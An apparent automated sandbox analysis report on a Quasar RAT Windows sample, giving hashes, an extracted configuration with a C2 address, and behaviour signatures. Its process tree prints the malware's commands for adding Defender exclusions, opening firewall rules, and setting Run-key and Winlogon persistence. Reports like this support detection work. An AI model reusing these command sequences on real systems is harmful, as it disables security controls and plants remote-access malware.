Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    01-11-2024 17:31

General

  • Target

    c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe

  • Size

    1.4MB

  • MD5

    f26ef938c2c4235c5e4cdb4ebb801fca

  • SHA1

    7c3413c638ea0c93cf2951cf05249df89bd98ff8

  • SHA256

    c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272

  • SHA512

    84d9d421b6794d412f55d8db296d55b46d25c0980da4a75eacf39d9ad912403bfd0a09142c907328df47b0a676826bd8a0ac422d6e89541da5ca49c13f073096

  • SSDEEP

    24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

-

C2

94.131.105.161:12344

Mutex

QSR_MUTEX_UEgITWnMKnRP3EZFzK

Attributes
  • encryption_key

    5Q0JQBQQfAUHRJTcAIOF

  • install_name

    lient.exe

  • log_directory

    Lugs

  • reconnect_delay

    3000

  • startup_key

    itartup

  • subdirectory

    SubDir

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 9 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
    "C:\Users\Admin\AppData\Local\Temp\c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\nslookup.exe
          nslookup myip.opendns.com. resolver1.opendns.com
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2904
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic ComputerSystem get Domain
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2996
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2780
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:436
      • C:\Users\Admin\AppData\Local\Temp\7z.exe
        7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3004
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2356
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2148
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2232
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic computersystem where name="BCXRJFKE" set AutomaticManagedPagefile=False
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2632
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1820
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1596
        • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
          "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1636
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:880
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1 -n 8
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2092
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
              6⤵
              • Modifies WinLogon for persistence
              • System Location Discovery: System Language Discovery
              PID:2388
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\Users\Admin\Music\rot.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:2736
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1 -n 20
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1332
        • C:\Windows\SysWOW64\attrib.exe
          "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2584
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:1684
      • C:\Users\Admin\AppData\Local\Temp\ratt.exe
        "ratt.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:720
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:680
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 7
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1648
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
            5⤵
            • Modifies WinLogon for persistence
            • System Location Discovery: System Language Discovery
            PID:2120
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\Music\rot.exe"
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:1532
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 14
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2604
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 14
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2568
          • C:\Users\Admin\Music\rot.exe
            "C:\Users\Admin\Music\rot.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1288
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2788

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7z.dll

    Filesize

    328KB

    MD5

    15bbbe562f9be3e5dcbb834e635cc231

    SHA1

    7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

    SHA256

    ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

    SHA512

    769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

  • C:\Users\Admin\AppData\Local\Temp\Add.ps1

    Filesize

    1KB

    MD5

    0df43097e0f0acd04d9e17fb43d618b9

    SHA1

    69b3ade12cb228393a93624e65f41604a17c83b6

    SHA256

    c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

    SHA512

    01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

  • C:\Users\Admin\AppData\Local\Temp\ratt.7z

    Filesize

    693KB

    MD5

    7de6fdf3629c73bf0c29a96fa23ae055

    SHA1

    dcb37f6d43977601c6460b17387a89b9e4c0609a

    SHA256

    069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

    SHA512

    d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

  • C:\Users\Admin\AppData\Local\Temp\ratt.bat

    Filesize

    1KB

    MD5

    7ea1fec84d76294d9256ae3dca7676b2

    SHA1

    1e335451d1cbb6951bc77bf75430f4d983491342

    SHA256

    9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

    SHA512

    ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    43d77b69fda94931904d5652ffad3a8a

    SHA1

    258d1c37b8189e81b24b9c5ec62f612d265be59f

    SHA256

    0287bdc50148224c4c3a89d33b53b38cba6de7de68a023af91cb3f0025951218

    SHA512

    d47530d0363c7fe455da0842fdea4780880513b0d0054399e629b302cbb19d52a08d7dee043578b8cae600a29febffeb5a67464b8e979b455f69bded061c636c

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Users\Admin\AppData\Local\Temp\7z.exe

    Filesize

    71KB

    MD5

    8ba2e41b330ae9356e62eb63514cf82e

    SHA1

    8dc266467a5a0d587ed0181d4344581ef4ff30b2

    SHA256

    ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

    SHA512

    2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

  • memory/720-80-0x0000000000440000-0x0000000000486000-memory.dmp

    Filesize

    280KB

  • memory/720-78-0x0000000000880000-0x0000000000A36000-memory.dmp

    Filesize

    1.7MB

  • memory/1288-90-0x0000000000740000-0x0000000000746000-memory.dmp

    Filesize

    24KB

  • memory/1288-89-0x0000000004170000-0x000000000418A000-memory.dmp

    Filesize

    104KB

  • memory/1288-88-0x00000000002D0000-0x0000000000486000-memory.dmp

    Filesize

    1.7MB

  • memory/1636-79-0x0000000000580000-0x00000000005C6000-memory.dmp

    Filesize

    280KB

  • memory/1636-75-0x00000000011F0000-0x00000000013A6000-memory.dmp

    Filesize

    1.7MB

  • memory/2788-97-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/2788-92-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/2788-93-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/2788-95-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/2788-99-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2788-100-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/2788-102-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/2788-101-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/2928-51-0x00000000001B0000-0x00000000001E2000-memory.dmp

    Filesize

    200KB

  • memory/3004-56-0x0000000010000000-0x00000000100E2000-memory.dmp

    Filesize

    904KB

  • memory/3004-58-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/3004-53-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/3004-62-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB